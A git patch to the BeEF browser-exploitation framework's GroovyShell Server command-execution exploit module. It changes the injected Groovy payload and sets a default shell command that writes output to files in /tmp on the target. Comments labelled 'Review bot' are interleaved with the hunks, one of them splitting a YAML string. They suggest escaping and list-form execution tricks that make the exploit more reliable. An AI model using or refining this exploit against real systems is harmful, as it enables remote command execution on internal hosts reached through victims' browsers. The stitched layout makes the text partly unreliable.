From 2dae1d4c0746823c1463f80f554289c831ee5c06 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Wed, 22 May 2013 14:37:01 +0930
Subject: [PATCH] Add `/bin/sh -c` to default command
---
 modules/exploits/groovyshell_server_cmd_exec/command.js | 2 +-
 modules/exploits/groovyshell_server_cmd_exec/config.yaml | 2 +-
 modules/exploits/groovyshell_server_cmd_exec/module.rb | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
index 9eeaf268f..3b8d43fd8 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/command.js
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -13,7 +13,7 @@ beef.execute(function() {
 // validate payload
 try {
 var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
- var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
+ var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
 } catch(e) {
 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
 return;
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
index 9ce57c7af..8bb4a20b5 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/config.yaml
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -9,7 +9,7 @@ beef:
 enable: true
 category: "Exploits"
 name: "GroovyShell Server Command Execution"
- description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.
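Review bot: The new payload line wraps `cmd` in Groovy single quotes, but the ERB escaping on the line above is designed only for the JavaScript literal: `gsub(/'/, "\\\'")` emits `\'` in the JS source, which the JS engine decodes back to a bare `'`, so any command containing a single quote (e.g. `sh -c 'id'`) now terminates the Groovy string early, whereas the removed double-quoted form tolerated it (at the cost of `$` being interpolated by Groovy). Escape for Groovy on the JS side before building the payload, e.g. `var gcmd = cmd.replace(/\\/g, '\\\\').replace(/'/g, "\\'");` and use `gcmd` in place of `cmd` on the payload line. The "spaces not supported" limitation this commit documents elsewhere presumably also comes from this line, since Groovy's `String.execute()` splits the string on whitespace into argv; the list form `['/bin/sh', '-c', gcmd].execute().text` hands the whole command to the shell intact and would make the `/bin/sh -c` default prefix and the caveat unnecessary. Neither error is visible to the operator: the Groovy side never reports back, and the `catch(e)` below only fires for runtime errors in the string concatenation, not for a Groovy parse failure. The enclosing `beef.execute(function() {` opens before this hunk and the catch block continues past it.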

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF."
+ description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
 authors: ["bcoles"]
 target:
 working: ["FF", "C"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
index e1dc60f1d..8f0526eb8 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/module.rb
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -10,7 +10,7 @@ class Groovyshell_server_command_execution < BeEF::Core::Command
 {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
 {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
 {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
- {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
 ]
 end
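Review bot: The added sentence `Note: Spaces in the command are not supported.` contradicts the default this same commit ships, `/bin/sh -c id>/tmp/id;uname>/tmp/uname`, which contains two spaces and is evidently expected to work. What presumably fails is a space inside the shell fragment handed to `/bin/sh -c`, because Groovy's `String.execute()` splits the whole string on whitespace into program and arguments, so the caveat should say that: `Note: the command string is split on whitespace into program and arguments, so the shell command given to /bin/sh -c must itself contain no spaces.` The description appears to be a single YAML line whose `\n` escapes were rendered as line breaks here, which is why the whole value shows as removed and re-added.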
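Review bot: The new default value `/bin/sh -c id>/tmp/id;uname>/tmp/uname` writes command output to fixed, predictable paths under `/tmp` on the target, which is the only way to observe a result given that the module returns nothing to BeEF, but the option description does not tell the operator that running the module with defaults leaves artifacts on disk, or that it presumes a Unix-like host with `/bin/sh`. Extend the option text, e.g. `'description' => 'Enter shell commands to execute. The default writes id/uname output to /tmp on the target (Unix-like hosts only). Note: Spaces in the command are not supported.'`. The default also only works because the `;`-chained shell fragment contains no whitespace and is therefore passed to `/bin/sh -c` as one token; this constraint is the same one the description sentence tries to express, and the two copies of that sentence (here and in config.yaml) should be kept in sync. The `options` array whose elements this hunk edits begins before the hunk.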